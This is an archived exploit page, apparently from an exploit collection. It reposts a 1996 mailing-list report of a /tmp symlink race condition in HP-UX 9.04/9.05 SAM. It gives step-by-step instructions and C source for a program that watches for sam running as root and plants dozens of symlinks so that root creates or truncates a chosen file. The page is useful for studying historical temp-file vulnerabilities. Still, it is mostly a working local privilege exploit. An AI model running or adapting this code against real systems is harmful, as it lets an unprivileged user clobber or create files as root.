Race condition exploit for HP/UX SAM

Summary

Description:	standard /tmp symlink race condition with HP/UX SAM
Author:	John W. Jacobi (jjacobi@nova.umuc.edu)
Compromise:	root (local)
Vulnerable Systems:	HP/UX with vulnerable SAM, at least HP-UX 9.04 & 9.05 on 9000/700 & 9000/800
Date:	25 September 1996
Notes:	for more HP bugs see the SOD HP Bug of the Week page

Details

Exploit:


From: John W. Jacobi (jjacobi@nova.umuc.edu)
Date: Wed, 25 Sep 1996 08:07:46 -0700 

I never saw this distributed to listserv recipients, that
is why I have sent it again.  Could you please repost.

Hi all,

Could someone confirm this for me or tell me if I am mistaken ???
Perhaps suggest an easy way to prevent this ???

I have discovered something that any user can exploit to
cause root to create or truncate files on the system when root runs sam.
I have put the source code that I wrote to verify it below.

Version: HP-UX 9.04 & 9.05 on 9000/700 & 9000/800

My basic question is:

      "Is there any more global and easy way to prevent this from
happening
aside from modifying the affected scripts ? as I have found that this
exists
in other places then just sam ?"  Perhaps something rather generic on
how root
follows sym links ?  Maybe I'm just pipe dreaming...

How it worked for me:

What really happens is that sam is a script and it calls another script
named ioparser.sh which writes to temporary file in /tmp of whose name
is
easily guessable.  Basically, if you see sam pop up in the process
table,
create a bunch of sym links of the format /tmp/. where
hostname is the hostname and pid is a number beginning at the sam's PID
+ 1
o       n up to some value like sam's PID + 50.  When the sam script calls the
ioparser.sh, it redirects output to a file like /tmp/.$$ (the
shell PID), follows the link, and as root creates or truncates what the
link
points to.

Any suggestions on what to do, however simple they might be would be
greatly
appreciated.

Thanks


How to do it:

Go to your HP 9.04/5 system first.

1. Log into your system as a normal user.
2. Compile the program below, making any changes if you need to. (you
shouldn't need to)
3. Log in on another terminal, become root and insure that sam is not
        currently executing.
4. As the normal user log in, run the program that you compiled in step
2.
5. On the root log in session, run sam.
6. Look at the target file.

/*    Code to exploit race of sam calling iopasrer.sh
    It will usually cause the ioparser.sh script run
        by root to follow the sym links created here to
    create or truncate TARGET_FILENAME as root.

        It ain't pretty and may not always work, but usually
        does.

        Compile on HP9000/[700/800] 9.04[5] with the command:

        cc racer.c -o racer -Ae

*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define PROC_TO_LOOK_FOR "sam"                  /* The process to look
for in ps */
#define TARGET_FILENAME "/check_this"   /* File that is created or
trunc'ed */
#define NUM_SYM_LINKS 50                                /* Increase this
for systems that fork() alot */

void main(void)
{
        char ps_buf[65536];     /* ps data buffer */
        char *line;                     /* a pointer in to the ps_buf */
        char f1[80];            /* buffer space for the sym link name */
        char hostname[32];      /* buffer space to hold hostname, duh */
        int fd;                         /* fd is for the pipe */
        int ext;                        /* the extantion to place on the
symlink (pid) */
        int loop;                       /* Dumb loop variable,
suggestions ??? */

        unlink("ps_fifo");                                      /* Why
not */
        mkfifo("ps_fifo",S_IRUSR|S_IWUSR);      /* Need this */
        fd = open("ps_fifo",O_RDONLY|O_NONBLOCK); /* You read the pipe
*/
        gethostname(hostname,32); /* gets the hostname just like
ioparser.sh !!! */

        printf("Looking for process %s, will exploit filename
%s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);

        /* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */

        while(1) {
                system("/bin/ps -u 0 > ps_fifo");

                read(fd,ps_buf,65536);

                if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) {
                        while( *line != '\n' ) {
                                line--;
                        }

                        line+=2;
                        line[5] = '\0';
                        ext = atoi(line);

                        for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++)
{
                                sprintf(f1,"/tmp/%s.%d",hostname,ext +
loop);
                                symlink(TARGET_FILENAME,f1);
                        }

                        while( (access(TARGET_FILENAME,F_OK)) < 0 );

                        printf("%s has run, wait a few seconds and check
%s\n",PROC_TO_LOOK_FOR,TARGET_FILENAME);
                        unlink("ps_fifo");
                        exit();

                }

        }

}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: